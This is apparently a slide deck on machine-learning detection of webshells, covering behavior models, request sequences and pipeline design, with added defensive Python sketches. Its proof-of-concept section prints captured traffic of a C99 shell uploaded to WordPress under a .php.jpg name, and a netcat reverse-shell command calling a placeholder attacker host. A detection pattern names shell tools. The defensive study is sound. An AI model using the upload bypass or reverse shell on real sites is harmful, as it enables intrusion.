  • 32. How do we Detect Webshells Using ML? • New approaches in machine learning and data science can help improve detection of compromised perimeter assets. • Two models of webserver behavior: Global Asset Behavior and Local Webserver Content Behavior (dynamic + static content) • The local feature vector answers questions like: How many times do users take a similar path on the webserver? How statistically rare is the path a user is browsing? • The global feature vector answers questions like: How often does this webserver communicate with DMZ IPs? Is there a trust relationship that has changed?
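One way to make the "how rare is this path" question concrete is to score each path by its surprisal over the observed requests. The sketch below is an assumption about how such a local feature could be computed, not the model from the talk; the function name `path_rarity` and the sample request list are hypothetical.

```python
from collections import Counter
from math import log2


def path_rarity(requests):
    """Map each path to its surprisal in bits: -log2(share of all requests)."""
    counts = Counter(requests)
    total = sum(counts.values())
    return {path: -log2(n / total) for path, n in counts.items()}


# Hypothetical request log for one webserver: 8 requests in total.
requests = (
    ["/index.php"] * 6
    + ["/about.php"]
    + ["/wp-content/uploads/2016/06/c9920161.php.jpg"]
)
rarity = path_rarity(requests)
for path, bits in sorted(rarity.items(), key=lambda item: item[1]):
    print(f"{bits:5.2f} bits  {path}")
```

Paths seen once out of eight requests score 3 bits, while the common index page scores well under 1 bit. Rarity alone does not separate the shell from an ordinary low-traffic page, which is why the slides pair it with other local and global features.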
  • 34. Webshell DMZ to LAN Trust Beyond the Indicator
  • 35. How do we Detect Webshells Using ML: Global Stats. Anomalies on rare paths: U->S; S->U (!!); U->U (LAN to LAN); S->S (DMZ to LAN) (!!). [Diagram: Desktop, Server, Desktop, Laptop, LAN Asset, DMZ Server]
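The DMZ-to-LAN case flagged on this slide could be checked with something like the sketch below. It assumes flows are available as (source IP, destination IP) pairs and that the zones are known subnets. The subnet values, `zone_of`, and `flag_dmz_to_lan` are hypothetical names for illustration, and a real model would score how rare the path is rather than flag every occurrence.

```python
import ipaddress

# Hypothetical zone layout; substitute the subnets of the real environment.
ZONES = {
    "DMZ": ipaddress.ip_network("192.0.2.0/24"),
    "LAN": ipaddress.ip_network("10.0.0.0/8"),
}


def zone_of(ip):
    """Return the zone name containing `ip`, or 'EXTERNAL' if none matches."""
    addr = ipaddress.ip_address(ip)
    for name, network in ZONES.items():
        if addr in network:
            return name
    return "EXTERNAL"


def flag_dmz_to_lan(flows):
    """Keep only flows initiated from a DMZ host toward a LAN host."""
    return [
        (src, dst)
        for src, dst in flows
        if zone_of(src) == "DMZ" and zone_of(dst) == "LAN"
    ]


flows = [
    ("10.1.1.5", "192.0.2.10"),      # LAN user browsing the DMZ server
    ("192.0.2.10", "10.1.1.9"),      # DMZ server reaching into the LAN
    ("198.51.100.7", "192.0.2.10"),  # internet client hitting the DMZ server
]
flagged = flag_dmz_to_lan(flows)
print(flagged)
```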
  • 36. Seeing the Analytic In Action
  • 38. Seeing the Analytic In Action Once the identity resolution/learning process is complete, we create new anomalies based on new paths/actions that are rare for a particular population profile. Lightweight Webshell in the DMZ
  • 39. How do we detect Webshells using ML... Based on these indicators we look for sequential behaviors. For example, we can look at the sequence of requests for a fixed (IP/User, Web server) pair. We can use Bro logs, web server logs, and perimeter traffic, as long as we have visibility into the application layer. By determining these sequences we can distinguish benign behavior from sequences of behaviors that indicate webshell-like activity.
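A minimal sketch of building those per-pair sequences, assuming log records have already been parsed into (timestamp, client, server, path) tuples. The record layout and the names `request_sequences` and `transitions` are assumptions for illustration, not a Bro or web server log format.

```python
from collections import defaultdict


def request_sequences(records):
    """Group records into time-ordered path lists per (client, server) pair."""
    sequences = defaultdict(list)
    for _ts, client, server, path in sorted(records, key=lambda r: r[0]):
        sequences[(client, server)].append(path)
    return dict(sequences)


def transitions(sequence):
    """Return consecutive (previous path, next path) pairs of one sequence."""
    return list(zip(sequence, sequence[1:]))


# Hypothetical parsed records, deliberately out of order.
records = [
    (3.0, "attackerIP", "victimdomain", "/wordpress/wp-admin/post-new.php"),
    (1.0, "attackerIP", "victimdomain", "/wordpress/?p=9"),
    (2.0, "attackerIP", "victimdomain", "/wordpress/wp-login.php"),
    (1.5, "otherIP", "victimdomain", "/wordpress/"),
]
sequences = request_sequences(records)
attacker_steps = transitions(sequences[("attackerIP", "victimdomain")])
print(attacker_steps)
```

Counting how often each transition occurs across all clients gives a baseline against which an unusual walk (login page, then new post, then a file under uploads) stands out.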
  • 41. How do we Detect Webshells Using ML: Local Stats Using machine learning techniques we can compute and build up statistics around some key data points. In the context of this particular vector we can use rare means/low frequency counts for a fixed website: - Rare time of site usage - Rare timestamps and creation times of files - Rare connection patterns - Large number of POST/GET requests to a specific file - Connection strings with command arguments (cmd.exe, /bin/bash, nc) - Unusual direct connections to files exposed to the internet - Unusual UA in comparison to normal traffic patterns when users visit the website or search engines index the site.
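The "connection strings with command arguments" indicator from the list above can be sketched with a simple pattern match on the URL-decoded request string. The pattern below covers only the three examples named on the slide (cmd.exe, /bin/bash, nc), and the function name and sample strings are hypothetical. It is meant as one weak feature to feed the statistics, not as a complete signature.

```python
import re
from urllib.parse import unquote_plus

# Covers only the examples named on the slide; deliberately not exhaustive.
COMMAND_PATTERN = re.compile(r"cmd\.exe|/bin/(?:ba)?sh|\bnc\b", re.IGNORECASE)


def has_command_args(raw_query):
    """True if the decoded query or body contains a shell-like command token."""
    return COMMAND_PATTERN.search(unquote_plus(raw_query)) is not None


samples = [
    "src=uploads/2016/06/photo.jpg&w=125&h=125&zc=1",  # benign thumbnail request
    "c=cmd.exe+%2Fc+whoami",                           # hypothetical Windows case
    "act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999", # body from the POC capture
]
hits = [has_command_args(sample) for sample in samples]
print(hits)
```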
  • 42. Webshell detection POC/Example For the proof of concept we gathered data on benign, normal browsing behavior and then replicated an RFI (Remote File Inclusion) attack, uploading a C99 webshell to the target host. In this particular sequence of referrer items it can be seen how the attacker browses around the site, possibly footprinting and searching for input fields.
  • 43. Webshell detection POC/Example The referrer sample sequence below shows browsing around the victim web site: - Referer: http://victimdomain/wordpress/?p=9 - Referer: http://victimdomain/wordpress/wp-content/themes/default/style.css - Referer: http://victimdomain/wordpress/wp-content/plugins/category-grid-view-gallery/css/style.css?ver=2.8.5 Further review of the referrers shows access to the WordPress login and admin pages: - Referer: http://victimdomain/wordpress/wp-login.php - Referer: http://victimdomain/wordpress/wp-admin/
  • 44. Webshell POC/Example The following sequence shows the attacker accessing the post feature and uploading a C99 shell, bypassing sanitization controls by adding a .jpg extension to the actual shell “c9920161.php”. This is done by abusing the new post feature, which includes uploading media: 00:28:39.469021 IP attackerIP.51399 > victimdomain.80: Flags [P.], seq 13419:14264, ack 145980, win 4096, options [nop,nop,TS val 787343940 ecr 195280], length 845: HTTP: GET /wordpress/wp-content/plugins/a-gallery/timthumb.php?src=http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1 ...D....GET /wordpress/wp-content/plugins/a-gallery/timthumb.php?src=http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg&w=125&h=125&zc=1 HTTP/1.1
  • 45. Webshell detection POC/Example Referer: http://victimdomain/wordpress/wp-admin/post-new.php (this is where the web shell is uploaded). Finally, the referrer sequence below shows the attacker browsing down to the web shell; the frequency of access to it is a signal of operator behavior in the sequential component of the TTP: - Referer: http://victimdomain/wordpress/?p=13 - Referer: http://victimdomain/wordpress/wp-content/uploads/ - Referer: http://victimdomain/wordpress/wp-content/uploads/2016/ - Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/ - Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg
  • 46. Webshell detection POC/Example The following packet capture snippet shows the attacker using netcat to open a reverse shell through the C99 command execution feature: 00:33:26.996555 IP attackerIP.51421 > victimdomain.80: Flags [P.], seq 0:1014, ack 1, win 4117, options [nop,nop,TS val 787630908 ecr 267163], length 1014: HTTP: POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg HTTP/1.1E..*..@[email protected] .....U......%........K<....POST /wordpress/wp-content/uploads/2016/06/c9920161.php.jpg Referer: http://victimdomain/wordpress/wp-content/uploads/2016/06/c9920161.php.jpg Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.8,es;q=0.6 Cookie: wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_c8c9d8ea3e0f27d770e745c21c00f45e=test%7C1465100854%7Cd83074c4a4a1c097c4eb44b42165d190; wp-settings-time-2=1464928107; PHPSESSID=cav3sgkd273gafknm9pb13m467 act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999&d=%2Fvar%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F&submit=Execute&cmd_txt=1
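To read the form-encoded POST body from this capture, it can be decoded with the standard library. The sketch below copies the body string from the capture, with the line-wrap space inside `%2Fwww%2Fwordpress` removed, and only the variable names are new. It shows how the `cmd` field expands into the netcat reverse-shell command.

```python
from urllib.parse import parse_qs

# POST body as shown in the capture (application/x-www-form-urlencoded).
body = (
    "act=cmd&cmd=nc+-e+%2Fbin%2Fbash+attackerIP+9999"
    "&d=%2Fvar%2Fwww%2Fwordpress%2Fwp-content%2Fuploads%2F2016%2F06%2F"
    "&submit=Execute&cmd_txt=1"
)

fields = parse_qs(body)   # decodes '+' to space and %XX escapes
command = fields["cmd"][0]
workdir = fields["d"][0]

print(command)
print(workdir)
```

Decoded, the shell is asked to run `nc -e /bin/bash attackerIP 9999` from the uploads directory where the disguised `.php.jpg` file lives.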
  • 48. Effective Webshell Detection via Machine Learning • Webshell ML detection paradigm • Two models of behavior: local behavior and global asset behavior • Local behavior is further broken down into individual history per path in a webserver. The webserver model is maintained as two separate graphs, one for dynamic content and one for static content • Feature vectors for the local content and path anomalies on a per-webserver basis are then correlated with global asset path behaviors.
  • 49. Conclusion - Machine learning and big data technologies enhance detection beyond simple static signature-based defense technologies. - It is possible to establish sequences of behaviors that indicate webshell access and use. - The data is already there. You can use your perimeter logs (Proxy, Firewalls, Bro, Web Gateway, etc.). - Detection mechanisms can also be enhanced and extended by covering any other measurable attack vector that delivers a web shell payload (SQLi, XSS, other types of RFI, etc.).
  • 50. Q&A
  • 51. Appendix Operational ML: How to Detect Attack Patterns That Change Over Time
  • 52. Step 1: Break the problem into use cases
  • 53. Step 2: Find which use cases have the highest security impact
  • 54. Step 3: Decompose the problem into two types of computation
  • 55. Step 3: Decompose the problem into two types of computation. Arbitrary User Behavior = Sequential Component + “Unordered” Component
  • 56. Step 3: Decompose the problem into two types of computation. Arbitrary User Behavior = Sequential Component + “Unordered” Component. Examples: Sequential Behaviors: 1. Exploit Chains 2. Timing Analysis (Periodicity) 3. Active Directory Sequence 4. Authentication Graph. Non-Sequential Behaviors: 1. Fingerprinting 2. Grouping Behaviors 3. Application Counts 4. Rare file extension counts for Webshell detection
  • 57. Step 3: Decompose the problem into two types of computation. Arbitrary User Behavior = Sequential Component + “Unordered” Component. Mapping Behaviors to Computational Paths: Easy to Parallelize: 1. Count() 2. Average() 3. Time series() 4. Local state computations per user/IP/account/… Hard to Parallelize (NC Complete Complexity): 1. Rank() 2. Median 3. Anything that keeps track of global state 4. Machine Learning Computations
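The difference between the two columns can be illustrated with a small sketch. Count and average can be computed per partition and merged from tiny partial results, while a median cannot be rebuilt from per-partition medians. The partition contents and the helper names `partial` and `merge` are hypothetical.

```python
from statistics import median


def partial(values):
    """Per-partition summary: (count, sum). Small and independent of other partitions."""
    return (len(values), sum(values))


def merge(a, b):
    """Combine two partial summaries; order of merging does not matter."""
    return (a[0] + b[0], a[1] + b[1])


# Two hypothetical partitions, e.g. request counts seen by two workers.
p1 = [1, 2, 3]
p2 = [4, 100]

count, total = merge(partial(p1), partial(p2))
mean = total / count

# The median needs a global view: combining per-partition medians is wrong here.
true_median = median(p1 + p2)
median_of_medians = median([median(p1), median(p2)])

print(mean, true_median, median_of_medians)
```

Here the merged mean matches the mean over all data, but the median of the partition medians differs from the true median, which is why rank-style statistics need shared global state or an approximation.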
  • 58. Step 4: Build an ML Model for each important sub-behavior
  • 59. Step 4: Build an ML Model for each important sub-behavior. Each model can run in batch, real-time, or hybrid mode
  • 60. Step 5: Operationalize the Model Life Cycle
  • 61. Step 5: Operationalize the Model Life Cycle How do we programmatically learn new patterns over time?
  • 62. Step 5: Operationalize the Model Life Cycle. How do we programmatically learn new patterns over time? When is an ML model ready? 1. When should we re-train? 2. How should new data be weighted over old data? 3. How do we know when a model is ready?
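One common answer to the weighting question is exponential decay: old evidence is discounted by its age before new evidence is added. The sketch below is an assumption offered for illustration, not the approach described in the talk. The function name and the seven-day half-life are hypothetical.

```python
def decayed_update(old_value, new_value, age_days, half_life_days=7.0):
    """Discount `old_value` by its age, then add the new observation.

    After one half-life the old value counts for half; after two, a quarter.
    """
    weight = 0.5 ** (age_days / half_life_days)
    return old_value * weight + new_value


# A path had an accumulated count of 100; a week later 10 new hits arrive.
updated = decayed_update(100.0, 10.0, age_days=7.0)
print(updated)
```

A shorter half-life lets the model follow attack patterns that change quickly, at the cost of forgetting the long-term baseline sooner. Choosing it is part of deciding when to re-train.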
  • 65. The Lambda Defense: A Complex Design Pattern
  • 66. Diagram inputs: DHCP, IMS/IPAM, FW, Proxy, VPN, AD. Real-Time Identity Resolution (Distributed ETL): Username = SELECT COALESCE(user_name, hostname, IP) FROM Active_ID_Table WHERE IP = '10.10.100.23'
      IP | DHCP.MAC | DHCP_Lasteventtime | AD_FQDN
      10.100.1.23 | 58:5c:35:c3:6e:a4 | 2014-03-11T14:00:00 | joe.eng.acme.com
      10.13.11.221 | 12:3a:74:b2:6a:22 | 2014-03-12T14:30:00 | ad.hr.acme.com
    Diagram labels: Data Ingest; Sequential Models and IOCs; Large Scale Models and Non-Sequential IOCs; Real Time Layer; Batch Layer; Hybrid View (Batch + Real Time)
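The coalesce lookup on this slide can be tried out with an in-memory SQLite table. This is only a sketch: the three-column schema, the sample rows, and the function name `resolve_identity` are assumptions, since the slide names the columns `user_name`, `hostname`, and `IP` in the query but does not show the full layout of `Active_ID_Table`.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Hypothetical schema: only the columns referenced by the slide's query.
conn.execute(
    "CREATE TABLE Active_ID_Table (IP TEXT PRIMARY KEY, user_name TEXT, hostname TEXT)"
)
conn.executemany(
    "INSERT INTO Active_ID_Table VALUES (?, ?, ?)",
    [
        ("10.100.1.23", None, "joe.eng.acme.com"),  # no user yet, hostname known
        ("10.0.0.99", None, None),                  # hypothetical row: only the IP is known
    ],
)


def resolve_identity(ip):
    """Best available identity for `ip`: user name, else hostname, else the IP itself."""
    row = conn.execute(
        "SELECT COALESCE(user_name, hostname, IP) FROM Active_ID_Table WHERE IP = ?",
        (ip,),
    ).fetchone()
    return row[0] if row else None


print(resolve_identity("10.100.1.23"))
print(resolve_identity("10.0.0.99"))
```

The fallback order means every event still gets some identity key even before DHCP or AD data has caught up, so later models can group behavior consistently.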

Editor's Notes

  • #21: Context: shades of grey is a good thing. People in security tend to think in black and white -> rules are brittle. Shades of grey is good: machine learning; defend with a layered security strategy. Examples of where certain kinds of behavior won't conform to a rule. How sequencing a bunch of small indicators and evidence from small heterogeneous: Black and white is good -> you are not transacting in blackh. Rules, statistics, humans. A simple question I use to assess the security posture of large enterprises is how easily they can answer this: ”For every network request in our network, can we determine the individual process on the host that generated the request?”
  • #22 to #26: Evidence from small heterogeneous: 100 files -> is not bad because it has not triggered the 10GB rule yet. Peer group -> never moves more than 10 files. VPN session -> comes from a small geolocation. Weaving a whole story based on the Black and white is good -> you are not transacting in blackh